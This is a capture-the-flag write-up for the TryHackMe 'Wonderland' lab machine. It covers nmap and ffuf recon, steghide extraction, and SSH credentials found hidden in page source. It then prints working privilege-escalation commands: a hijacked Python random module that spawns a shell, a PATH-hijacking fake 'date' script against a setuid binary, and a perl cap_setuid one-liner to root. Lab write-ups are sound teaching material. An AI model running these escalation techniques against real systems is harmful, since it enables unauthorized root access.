Wonderland - Writeup

2 minute read

Jan 11, 2021

Wonderland Writeup

Recon :

bvr0n@kali:~/CTF/THM/Wonderland$ nmap -sC -sV 10.10.252.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-10 10:28 EST
Nmap scan report for 10.10.252.9
Host is up (0.092s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Recon :

Goin to the web page gets us only a jpeg image, let’s download it and see what can we do with it :

bvr0n@kali:~/CTF/THM/Wonderland$ wget http://10.10.252.9/img/white_rabbit_1.jpg
bvr0n@kali:~/CTF/THM/Wonderland$ steghide extract -sf white_rabbit_1.jpg 
Enter passphrase: 
wrote extracted data to "hint.txt".

Turns out, there is a files hidden inside that says this :

follow the r a b b i t

I didn’t understand it at first, but when i brute forced directories i got the idea :

bvr0n@kali:~/CTF/THM/Wonderland$ ffuf -c -u http://10.10.252.9/FUZZ -w ~/Documents/Dirbuster/wordlist.txt 

img                     [Status: 301, Size: 0, Words: 1, Lines: 1]
index.html              [Status: 301, Size: 0, Words: 1, Lines: 1]
r                       [Status: 301, Size: 0, Words: 1, Lines: 1]

The files was pointing to a path in the browser :

http://10.10.252.9/r/a/b/b/i/t/

Once i checked the code source i found a hidden text, hidding alice’s SSH creds :

alice:**********************************************

Privilege Escalation :

After some enumeration, i found out that the /root/ is accessible by everyone but read permission was not given, on the other hand execute permission was present, so we can get the user.txt

  • Rabbit User :

in Alice home directory there is a script that basically import the random module.

So, we can create a file named random.py in our current working directory that executes /bin/bash This way the python file should be loaded instead of the “real” random module, and in turn give us a shell as the rabbit user.

random.py :

import os

os.system("/bin/bash")
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$
  • Hatter User :

In /home/rabbit we can see a setuid binary, after examining the file, we can see that date is getting executed without pecifying an absolute path :

Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)

We can abuse this by exporting our own $PATH and providing a fake date script that will give us a shell with the user :

rabbit@wonderland:/tmp$ cat date 
#!/bin/bash
/bin/bash
rabbit@wonderland:/home/rabbit$ chmod +x date
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami
hatter

Inside his directory we can find his ssh credentials :

hatter@wonderland:/home/hatter$ cat password.txt 
****************************
  • Root :

After some enumeration, linpeas showed something intresting :

Files with capabilities:
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Looks like perl have this capability cap_setuid+ep and that we can abuse, GTFOBins :

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
root@wonderland:~# whoami; id
root
uid=0(root) gid=1003(hatter) groups=1003(hatter)

Hope you like it.

Updated: